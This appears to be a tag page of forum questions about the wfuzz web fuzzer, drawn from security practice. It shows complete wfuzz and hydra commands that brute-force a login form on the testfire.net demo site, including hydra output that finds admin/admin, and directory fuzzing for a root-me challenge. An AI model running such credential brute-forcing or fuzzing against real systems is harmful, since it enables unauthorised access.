Tag: Wfuzz

wfuzz default number of connects in parallel per target?

In Hydra, default number of connects in parallel per target is 16 and it can be changed with -t flag.

E.g. -t 100 for 100 connection in parallel per target.

wolf@linux:~$   hydra -h | grep parallel   -t TASKS  run TASKS number of connects in parallel per target (default: 16)   -T TASKS  run TASKS connects in parallel overall (for -M, default: 64) wolf@linux:~$

What about wfuzz? I did not see this info in it’s help menu. Is it possible to change it’s value?

wolf@linux:~$   wfuzz -h | egrep -i 'thread|parallel' wolf@linux:~$

wfuzz show –hs responses when it should hide it

Test site: http://testfire.net/login.jsp

Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

Web Form

<form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">           <table>             <tbody><tr>               <td>                 Username:               </td>               <td>                 <input type="text" id="uid" name="uid" value="" style="width: 150px;">               </td>               <td>               </td>             </tr>             <tr>               <td>                 Password:               </td>               <td>                 <input type="password" id="passw" name="passw" style="width: 150px;">                 </td>             </tr>             <tr>                 <td></td>                 <td>                   <input type="submit" name="btnSubmit" value="Login">                 </td>               </tr>           </tbody></table>         </form>

The actual password is admin too. Therefore, I created simple passlist.txt for this purpose.

wolf@linux:~$   cat passlist.txt  admin pwd pass password wolf@linux:~$

wfuzz flag

--ss/hs regex             : Show/Hide responses with the specified regex within the content

Here are few tests, but none of them really work.

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/doLogin

wolf@linux:~$   wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin  Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.  ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer                         * ********************************************************  Target: http://testfire.net/doLogin Total requests: 4  =================================================================== ID           Response   Lines    Word     Chars       Payload                                                                           ===================================================================  000000003:   302        0 L      0 W      0 Ch        "pass"                                                                            000000004:   302        0 L      0 W      0 Ch        "password"                                                                        000000001:   302        0 L      0 W      0 Ch        "admin"                                                                           000000002:   302        0 L      0 W      0 Ch        "pwd"                                                                              Total time: 0.517212 Processed Requests: 4 Filtered Requests: 0 Requests/sec.: 7.733766  wolf@linux:~$

wfuzz -cz file,passlist.txt –hs Failed -d “uid=admin&passw=FUZZ&btnSubmit=Login” http://testfire.net/login.jsp

wolf@linux:~$   wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp  Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.  ******************************************************** * Wfuzz 2.4.5 - The Web Fuzzer                         * ********************************************************  Target: http://testfire.net/login.jsp Total requests: 4  =================================================================== ID           Response   Lines    Word     Chars       Payload                                                                           ===================================================================  000000003:   200        194 L    582 W    8519 Ch     "pass"                                                                            000000001:   200        194 L    582 W    8519 Ch     "admin"                                                                           000000002:   200        194 L    582 W    8519 Ch     "pwd"                                                                             000000004:   200        194 L    582 W    8519 Ch     "password"                                                                         Total time: 0.583132 Processed Requests: 4 Filtered Requests: 0 Requests/sec.: 6.859507  wolf@linux:~$

It didn’t work even thought the right user/pass combination was there.

Any idea what’s wrong in this wfuzz syntax?

hydra can do this without any problem and identified the credential accurately.

wolf@linux:~$   hydra testfire.net http-post-form \ > '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' \ > -l admin -P passlist.txt -V Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36 [DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task [DATA] attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed [ATTEMPT] target testfire.net - login "admin" - pass "admin" - 1 of 4 [child 0] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "pwd" - 2 of 4 [child 1] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "pass" - 3 of 4 [child 2] (0/0) [ATTEMPT] target testfire.net - login "admin" - pass "password" - 4 of 4 [child 3] (0/0) [80][http-post-form] host: testfire.net   login: admin   password: admin 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39 wolf@linux:~$

curl to wfuzz translation

I am trying to run wfuzz to match the curl command which works, I know valid credentials but it doesn’t seem to pass it properly.

wfuzz -c -w user -w pass -b "session=cookie" --digest FUZZ:FUZ2Z "http://192.119.2.3/"

(user and pass files contain user and pass accordingly)

curl -c cookie --digest -u user:pass http://192.119.2.3

The target is running Gunicorn web server

find out unprotected commonly used subdirectories with wfuzz

I try to solve a pentesting challenge where I have to find out a directory, which is unprotected from directory listing.

I tried to find it with 

wfuzz -c -z file,'wordlist.txt' --hc 404 http://challenge01.root-me.org/realiste/ch3/FUZZ

But my wordlist is not suiting the task. Usually you are searching for words like 

admin images develop dev disabled secret backup bak includes functions bin lib ...

How do I generate such a list with most commonly used subdirectories?

How do I pass a list of cookies to Wfuzz?

I know that you can pass cookies in Wfuzz by using multiple -b parameters like so: wfuzz -w /path/to/wordlist -b cookie1=foo -b cookie2=bar http://example.com/FUZZ

but I am wondering if you can pass a list of cookies, instead of doing them one by one, which takes forever and is ineffecient. I have looked everywhere for an answer it seems but I can’t find one.